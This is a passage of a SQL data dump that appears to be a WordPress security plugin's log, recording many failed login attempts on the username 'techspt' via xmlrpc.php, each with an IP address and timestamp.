WEzIBR2T9fork7iwgHevPG6F','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('31.172.80.82',531386450,'techspt',0,1681496213.4260,152,'vihC8KISXdLFTsN3Y9G127bn','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('157.245.147.60',2650116924,'techspt',0,1681499320.5636,152,'wtAXIpcsfRvT2eBPOyVigEbG','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('52.66.42.83',876751443,'techspt',0,1681499322.4556,152,'1O695HPzaZBgswbn8Rq2iKEI','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('185.135.132.97',3112666209,'techspt',0,1681499330.0173,152,'FgDrmYKn7vhjZiONzkb0u58s','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('149.129.227.62',2508317502,'techspt',0,1681499339.7269,152,'pN3OKznb9xYPCwTkXZlgvuLA','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('89.163.145.59',1503891771,'techspt',0,1681499340.5679,152,'FSm7trOKB1vR8WjyNVkPQzUi','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('91.225.138.200',1541507784,'techspt',0,1681499343.8020,152,'DuBcFoYIsG9ROnAN8yMgl54j','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('66.42.49.228',1110061540,'techspt',0,1681499352.4686,152,'U4IdBjGEPN9y2bLpfD1iwRtQ','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('88.214.28.5',1490426885,'techspt',0,1681499354.4710,152,'rnV02OX1D5wz8cpHJPQS4kIU','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('207.55.248.19',3476551699,'techspt',0,1681499362.2752,152,'DXO1I8f70Alaug6oNhiQHdSZ','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('162.219.176.3',2732306435,'techspt',0,1681500479.4836,152,'XdQ5SOpflteT92YoNs4P6Ggq','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('91.231.84.41',1541887017,'techspt',0,1681501680.4686,152,'dW03HBeEFs6P5DLuwXh8nRqQ','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('34.87.13.139',576130443,'techspt',0,1681503177.6066,152,'PTl38NO9m4IQpvy2Me6LuXcW','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('189.203.144.160',3184234656,'techspt',0,1681503180.2767,152,'brvGMoXRi5lwYS4HzWmPE3OJ','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('141.98.18.59',2372014651,'techspt',0,1681503184.4651,152,'QoOq2fLbtJFvgypnk3cBN51T','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('72.167.57.16',1218918672,'techspt',0,1681503184.7591,152,'4h7f5YLa8iKVrpDCbQlwBmuo','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('41.193.5.58',700515642,'techspt',0,1681503197.0854,152,'lgZSEkTyouWd8J9nfmMhR6aY','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('74.208.59.184',1255160760,'techspt',0,1681503203.9472,152,'JOdwRky0ivICA821Zn4MzuXm','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('69.49.247.110',1160902510,'techspt',0,1681503206.2700,152,'YWCNbpSDano8hjrBEsPtcXJI','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('165.22.211.204',2769736652,'techspt',0,1681503212.6773,152,'ZuIX3pQxbqsRO0V9cGAfYLHw','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('68.178.229.122',1152574842,'techspt',0,1681504584.5523,152,'wNohu35I1v0KsRjlOdGktiga','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('45.77.243.188',760083388,'techspt',0,1681504586.1671,152,'0EYzTdt8uogGNKyxPnqar9VI','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('34.80.163.64',575710016,'techspt',0,1681504591.1423,152,'sjrbGw2UfcI1JoEAxCBPlz5T','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('149.248.50.72',2516070984,'techspt',0,1681504594.6332,152,'2GbuWEiZV34rXOCacQypfsz1','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('104.207.254.152',1758461592,'techspt',0,1681504597.2679,152,'QcS3JCuYxZlyH9PnhoXwt1s2','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('74.208.233.41',1255205161,'techspt',0,1681504601.5379,152,'SdxepA5F1YD0l6XfuiwULnZK','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('95.167.178.158',1604825758,'techspt',0,1681505269.6948,152,'S5ZJhYWHodNryFQ1bAT6c7u8','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('46.38.249.174',774306222,'techspt',0,1681505270.6574,152,'gPxstZ4KUkcWHOM9pjCdQfDo','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('206.189.129.241',3468526065,'techspt',0,1681505365.5010,152,'OYiZhAwU7qxIHRMWfpazrQDj','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('63.142.251.6',1066334982,'techspt',0,1681507266.5468,152,'EhTc60LCPuM1qbkmliDIVO2z','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('14.225.192.104',249675880,'techspt',0,1681507267.2938,152,'kwQ3e95jEJr1CgKs7H60yOcn','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('178.21.17.239',2987725295,'techspt',0,1681507283.5040,152,'fSGELejW6Os8itvq0dr9ARXy','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('92.205.2.176',1556939440,'techspt',0,1681507286.2287,152,'B07k2Qu1gnTXZfYO6AUDozeS','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('72.167.57.16',1218918672,'techspt',0,1681507290.9845,152,'5EFbWvZ1i9tQdCXm7Ln8kyzr','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('101.32.41.71',1696606535,'techspt',0,1681507293.0200,152,'qpO53MdAyVDeE7PGm2sFSX4v','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('74.208.59.164',1255160740,'techspt',0,1681507300.0459,152,'qOGNsX45BTJvRytIi0pV8CUK','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('47.242.62.161',804404897,'techspt',0,1681507301.2429,152,'ZAcpsLyYIXWqdUBOhRVbN0t9','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('101.32.41.71',1696606535,'techspt',0,1681507301.3433,152,'zWsGPF1RaDVqp6j49CZr2Snk','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('101.32.41.71',1696606535,'',0,1681507301.3479,10,'zWsGPF1RaDVqp6j49CZr2Snk','','701|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,701,0),('185.2.5.88',3103917400,'techspt',0,1681507314.8170,152,'c9VjKPiOsuhXRSdZvyHtmoFC','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('82.165.86.47',1386567215,'techspt',0,1681510871.0666,152,'Jm2rlObNIct7PyCaLh8qg5K4','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('207.180.207.149',3484733333,'techspt',0,1681510872.6629,152,'5fFZK2zM7Irkn93ciTlRqCJG','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('5.39.4.40',86443048,'techspt',0,1681510873.2677,152,'rgvY7hALKoZW69aHwfXxFGV4','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('38.242.129.230',653427174,'techspt',0,1681510880.8171,152,'BvgE0xDLsJlkn4hMKcX7ARdu','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('150.158.148.229',2526975205,'techspt',0,1681510891.3716,152,'xIoierhAsNMfXqBpg9SYP1Zn','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('185.2.5.88',3103917400,'techspt',0,1681510893.2694,152,'v02I9ChBwVd3RF5lNZgqkJXr','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('194.195.112.30',3267588126,'techspt',0,1681510901.1322,152,'ipJyswBt0MLOkrYnv3m2ZV4F','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('178.32.201.69',2988493125,'techspt',0,1681510901.8899,152,'dRfA9zlChJ0PpBGiQea3v6nZ','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('207.55.248.19',3476551699,'techspt',0,1681510906.1822,152,'yEgNekGCjlY472QSVh9svo1F','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('18.218.139.173',316312493,'techspt',0,1681510906.6866,152,'tdhm6uOLVTDH2e4iz1AyJpXq','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('34.80.163.64',575710016,'techspt',0,1681510908.3757,152,'bA0yVr3PaYWqUcFdSpnZJCEO','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('50.62.137.47',842959151,'techspt',0,1681510910.4438,152,'6sqjQpNWMeDh5ta0CGobEK8z','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('80.244.168.40',1358211112,'techspt',0,1681510911.4806,152,'aQEN7J1reusUi8TtjhpvWxOL','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('5.39.4.40',86443048,'techspt',0,1681510911.6618,152,'VKzrjkcAgpGxd2NXa16OUC9y','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('5.39.4.40',86443048,'',0,1681510911.6661,10,'VKzrjkcAgpGxd2NXa16OUC9y','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('195.28.11.220',3273395164,'techspt',0,1681510912.4896,152,'59GaCFbpstST2iINPRzZjfH4','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('173.231.207.89',2917650265,'techspt',0,1681510913.5897,152,'fHeNcQ03p7wPkatB5KjE4goS','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('82.223.115.237',1390375917,'techspt',0,1681510914.8861,152,'dLI58FeJy2njogmMvAXDt0Wi','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('128.14.142.233',2148437737,'techspt',0,1681510920.2890,152,'aeyUZ3qtk7gm0KbCR9l4unJB','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('207.55.248.19',3476551699,'techspt',0,1681510923.8835,152,'ksG4JdbPg6ucNRAUzTBL3D0x','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('207.55.248.19',3476551699,'',0,1681510923.8862,10,'ksG4JdbPg6ucNRAUzTBL3D0x','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('3.225.238.13',65138189,'techspt',0,1681510934.9262,152,'06BWAP5QDu8nJFX7bMj3Vtke','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('213.152.161.69',3583549765,'techspt',0,1681511457.5859,152,'KGOi7j8JT3ueBrXQ4vpldAoZ','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('82.165.80.95',1386565727,'techspt',0,1681513655.3483,152,'yfIG9RE5UWDsq8nma2TgVd1B','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('128.199.67.142',2160542606,'techspt',0,1681513663.6730,152,'zWicJVNsKdIL3tfX4uSE2yDl','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('79.139.59.17',1334524689,'techspt',0,1681513673.4304,152,'6ZfJg1OhuvCKwaWMtBkUEmNe','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('103.171.90.148',1739283092,'techspt',0,1681513677.8690,152,'3cgiytLAHeJ6MvZV7nUdFhN1','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('134.122.120.71',2256173127,'techspt',0,1681513678.5865,152,'ogCWJPOkcD0LNYa6KU3RApEf','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('81.88.53.58',1364735290,'techspt',0,1681513682.0623,152,'GUBZcWD8JyeFai579jdQkrRz','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('103.101.161.81',1734713681,'techspt',0,1681513682.9095,152,'lrbTcvZQjp76dRMxVaPNkLqS','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('170.249.206.66',2868497986,'techspt',0,1681513684.5135,152,'kyvAnwEX5O0icKmHLJdCWThG','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('159.203.161.65',2680922433,'techspt',0,1681513691.6250,152,'OGaFrlpmP1bD63u2EYsACBTL','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('82.223.115.237',1390375917,'techspt',0,1681513692.9339,152,'giFIe6TJb5CXQwHrAqPNGflh','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('35.214.190.212',601276116,'techspt',0,1681513697.7758,152,'u5ewI7JD2O9Gdhy8QnlV3bkW','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('212.85.99.184',3562365880,'techspt',0,1681513697.8885,152,'tfJQI7APOpFZqvuXyWk42KTm','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('31.172.80.82',531386450,'techspt',0,1681515132.0007,152,'7x0weZ9IjYWQOAJUfX4iLTnC','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('182.50.151.70',3056768838,'techspt',0,1681515132.5539,152,'SxAYgCiGUz7yn3RwqWQMdXDJ','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('43.155.103.11',731604747,'techspt',0,1681515132.6397,152,'zdF5YQa3qGyA4MRIwOvVcjDN','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('178.32.201.69',2988493125,'techspt',0,1681515143.2301,152,'uPHktWw13Ix5v2qg7Jj4AMZN','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('103.146.176.238',1737666798,'techspt',0,1681515150.9725,152,'E5bxF72puGSsrCJZL4QAfehy','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('31.172.80.82',531386450,'techspt',0,1681515163.3889,152,'HiXQ1LxvFnrq2tVP7OMyRfwh','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('31.172.80.82',531386450,'',0,1681515163.4450,10,'HiXQ1LxvFnrq2tVP7OMyRfwh','','701|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,701,0),('75.119.135.6',1266124550,'techspt',0,1681515163.5061,152,'AU8khx1Ir2bGz43PldNsfEwK','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('148.66.145.137',2487390601,'techspt',0,1681515168.5495,152,'jroNPg7DhmkvV9KueC48xFqw','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('65.109.50.60',1097675324,'techspt',0,1681515175.9250,152,'ab8XcRPT7mt2wosrx4eF9SBA','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('207.55.248.19',3476551699,'techspt',0,1681525897.2670,152,'XyOEhkaz7fIQFrZSLj3Ac1ep','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('159.203.161.65',2680922433,'techspt',0,1681525906.9176,152,'ofbpUelHvBYJDQch0x3gaL2T','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('144.126.132.168',2424210600,'techspt',0,1681525910.2296,152,'Ht2TdiAXNLJDvw6BOxbs5ClG','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('66.42.49.228',1110061540,'techspt',0,1681525914.0174,152,'GCcdUT14F7NLDw3b9uKqsi0P','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('212.90.148.14',3562705934,'techspt',0,1681525918.7216,152,'OxHrS0WBNgUTXkywni9ZVmfP','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('199.59.90.4',3342555652,'techspt',0,1681525928.3722,152,'QR2eYtsMxiFa7T6CBXDPpJkq','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('199.59.90.4',3342555652,'techspt',0,1681525928.3748,152,'zcsUTd3pWJGFb0rxaI2Ny4Si','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('199.59.90.4',3342555652,'',0,1681525928.3789,10,'QR2eYtsMxiFa7T6CBXDPpJkq','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('47.243.171.230',804498406,'techspt',0,1681525932.6529,152,'JuGe0yHZk2OhnFtvUwmoWMp6','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('144.126.132.168',2424210600,'techspt',0,1681525936.7360,152,'9W354MkwnR2vqtu1IzHUhgVx','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('144.126.132.168',2424210600,'',0,1681525936.7439,10,'9W354MkwnR2vqtu1IzHUhgVx','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('92.205.2.176',1556939440,'techspt',0,1681526788.9434,152,'9jMzBRyxpUWXrFl7h1IOZdsv','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('176.56.56.133',2956474501,'techspt',0,1681526793.2358,152,'AogjnX7CeKyslGkRSWYONmUJ','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('101.50.2.67',1697776195,'techspt',0,1681526794.2217,152,'wx4rWDXaN9hpYM65TjdlemI3','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('185.2.5.88',3103917400,'techspt',0,1681526802.4750,152,'eRaYAZ01L7l5wfvuzmqV6P3s','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('138.186.9.114',2327447922,'techspt',0,1681526814.9842,152,'AwQSpRgDEY7eTdPNZ6atn3q0','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('50.62.137.47',842959151,'techspt',0,1681526821.9030,152,'vlRaoU7ZrxtpFPw1XeA9kzCK','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('141.98.18.59',2372014651,'techspt',0,1681526822.6986,152,'uXMo9egUvlE4Y85mLnNbjJcW','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('184.75.221.43',3091979563,'techspt',0,1681528154.3046,152,'AMGb2U1Ou7KdQqIp4ftg5Sr9','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('185.156.175.51',3114053427,'techspt',0,1681530373.4920,152,'uJzZjtl9bVgWeQ0cwyTKHmGN','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('104.254.90.235',1761499883,'techspt',0,1681530846.8045,152,'AcP8h5pH6ROBSMvbCo4wiZ1a','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('185.253.215.16',3120420624,'techspt',0,1681533499.1281,152,'LhPs6SwJIM2BQRxFlvcTg07i','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('103.42.56.253',1730820349,'techspt',0,1681533504.0359,152,'4ItRHPN5BZvDGeCTckqhjpX6','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('199.85.208.215',3344290007,'techspt',0,1681533508.8878,152,'YPSd3KUHof4r5QBkezCT82OI','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('89.201.167.100',1506387812,'techspt',0,1681533509.6401,152,'dVvjq6uKUF3ISEsOk1BtTa2P','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('103.159.84.218',1738495194,'techspt',0,1681533514.3502,152,'LqoY4dGDfkM9TgWSHsB57UQN','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('190.92.247.74',3193763658,'techspt',0,1681533517.9254,152,'bVxGYralyD2CJ0n81wRAMdZe','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('125.227.111.133',2112057221,'techspt',0,1681533523.3168,152,'0KJFSzL1vmtgUVd6CwuPcHsx','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('199.85.208.215',3344290007,'techspt',0,1681533531.6563,152,'dz9PW75RX4rsbSOIFZkpnoDY','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('199.85.208.215',3344290007,'',0,1681533531.6589,10,'dz9PW75RX4rsbSOIFZkpnoDY','','701|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,701,0),('34.87.13.139',576130443,'techspt',0,1681533532.4510,152,'0rl1q2793biWYeLmcBXEpC8s','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('162.0.232.58',2717968442,'techspt',0,1681533535.4376,152,'ZB1CfD0P5jgqxURKze698nYu','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('103.117.180.72',1735767112,'techspt',0,1681534844.5557,152,'fXoCRr4FnH2lu7EDjySULc61','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('35.214.190.212',601276116,'techspt',0,1681534846.5549,152,'VJ8ogOY2htqWme1kBuyHNPrp','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('144.126.132.168',2424210600,'techspt',0,1681534847.0800,152,'w91ZLAeIjr3xd64bnSXyq7lV','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('107.190.132.194',1807647938,'techspt',0,1681534861.5785,152,'xjdu82047fnoC1e6IKVktWDR','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('159.203.161.65',2680922433,'techspt',0,1681534862.1238,152,'ijphUbfray5IxAY2g43BeJlG','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('202.61.232.109',3393054829,'techspt',0,1681534868.2647,152,'bzMYf4AJkTPUO3NSglHupI29','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('144.126.132.168',2424210600,'techspt',0,1681534868.2816,152,'CkNev6OrDFRx82zGpHT0qcsU','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('144.126.132.168',2424210600,'',0,1681534868.2858,10,'CkNev6OrDFRx82zGpHT0qcsU','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('103.221.223.238',1742594030,'techspt',0,1681535578.5088,152,'VbWALOCqRS0nzNByjUFKuXHG','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('207.180.207.149',3484733333,'techspt',0,1681535579.2335,152,'cnKATIMamENwvGihoqJzkXCD','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('91.231.140.73',1541901385,'techspt',0,1681535590.1355,152,'6VMANRqnvHQmXy4O7sKbjcxl','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('202.61.232.109',3393054829,'techspt',0,1681535590.9034,152,'6JpTn2diIkGWA0H8xXyR1FqP','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('202.61.232.109',3393054829,'',0,1681535590.9081,10,'6JpTn2diIkGWA0H8xXyR1FqP','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('162.0.229.115',2717967731,'techspt',0,1681535593.6137,152,'mHKxFqzN9OBVQd1s6EAleMpX','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('184.75.221.171',3091979691,'techspt',0,1681536218.6428,152,'215woV4mqjHJPKgZGnvX30Eb','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('149.248.50.72',2516070984,'techspt',0,1681537023.3260,152,'JoLrw1EKORTcAsQC9dmFgfeZ','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('159.203.161.65',2680922433,'techspt',0,1681537023.9804,152,'ZquMNHoShK2zIa48U7jerCPW','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('27.100.11.206',459541454,'techspt',0,1681537026.6304,152,'cIR7xa5GUiCKJs3npNmhwWrz','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('66.42.49.228',1110061540,'techspt',0,1681537031.1459,152,'5UA8rHMiIthXS9bVDTa6QKFB','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('5.255.98.122',100622970,'techspt',0,1681537036.8135,152,'6uXi4qB1ESjxdyPaC7eAt9KT','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('160.153.155.29',2694421277,'techspt',0,1681537040.2256,152,'sJxMVqmilXFtO2U1Q3cInh09','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('5.255.98.122',100622970,'techspt',0,1681537040.5589,152,'taPpJdBD7GHIxKvqe8wr52Ri','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('5.255.98.122',100622970,'',0,1681537040.5622,10,'taPpJdBD7GHIxKvqe8wr52Ri','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('207.55.248.19',3476551699,'techspt',0,1681537050.1096,152,'5vERZaC3OLdQlxHGKrf4VTs7','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('5.135.143.169',92770217,'techspt',0,1681537053.8221,152,'W3E1lhZ9YNAMzTVdFqpbHXc6','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('82.223.115.237',1390375917,'techspt',0,1681537060.4842,152,'I6gdHyRqotV0pPK2W5AlfinE','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('183.181.91.159',3082115999,'techspt',0,1681537065.9667,152,'hFRcATGyE6DfX7b4IQsqYPZr','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('47.243.171.230',804498406,'techspt',0,1681537066.4391,152,'QjbwV4eolPUEIGcfu06ATrmp','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('184.75.223.235',3091980267,'techspt',0,1681538535.3350,152,'vQs2wr63Xl7JF19ad0gCZeok','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('104.254.90.187',1761499835,'techspt',0,1681538554.3562,152,'0Lkbdei8gxuNAOt4wp5FXsHY','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('183.181.91.159',3082115999,'techspt',0,1681541417.3067,152,'AOILSlCnErJZjRkP2g46qQ0b','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('178.32.187.122',2988489594,'techspt',0,1681541420.5545,152,'aW9xs2dyT4Dwv7bK5lkMhQZA','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('195.154.107.17',3281677073,'techspt',0,1681541427.9100,152,'1ly8NhD3zk5LG0Jfp4TXYFVa','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('195.158.22.187',3281917627,'techspt',0,1681541449.9114,152,'l28FdYx10c9BHWEhrMSmanL4','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('47.243.171.230',804498406,'techspt',0,1681541450.4869,152,'dhfkCM5FPv9igT26yDornNe0','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('213.152.161.211',3583549907,'techspt',0,1681541648.4804,152,'pX4tMIuq2zd9LiV7JH1TslSx','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('173.231.207.89',2917650265,'techspt',0,1681544013.9168,152,'XVmaT3FInBEiPvsuJCOqjNtf','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('68.178.228.199',1152574663,'techspt',0,1681544014.0561,152,'swnXarU6KoJ5qzHtmjpL8gev','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('144.76.74.227',2420919011,'techspt',0,1681544014.5719,152,'mwbr7yOou9TvKZLhAptRBzaU','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('77.220.104.89',1306290265,'techspt',0,1681544019.4886,152,'j8fZGi9yewru6M2bSVQ3Lzs5','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('68.178.228.199',1152574663,'techspt',0,1681544024.7948,152,'LlJk43A8VCSRrUe5IHnwKdsg','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('68.178.228.199',1152574663,'',0,1681544024.7981,10,'LlJk43A8VCSRrUe5IHnwKdsg','','701|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,701,0),('148.72.210.101',2487800421,'techspt',0,1681544039.9851,152,'BpaeX8KDoh0O9CkY5LmVZ3zj','','0|0|0|0|cmd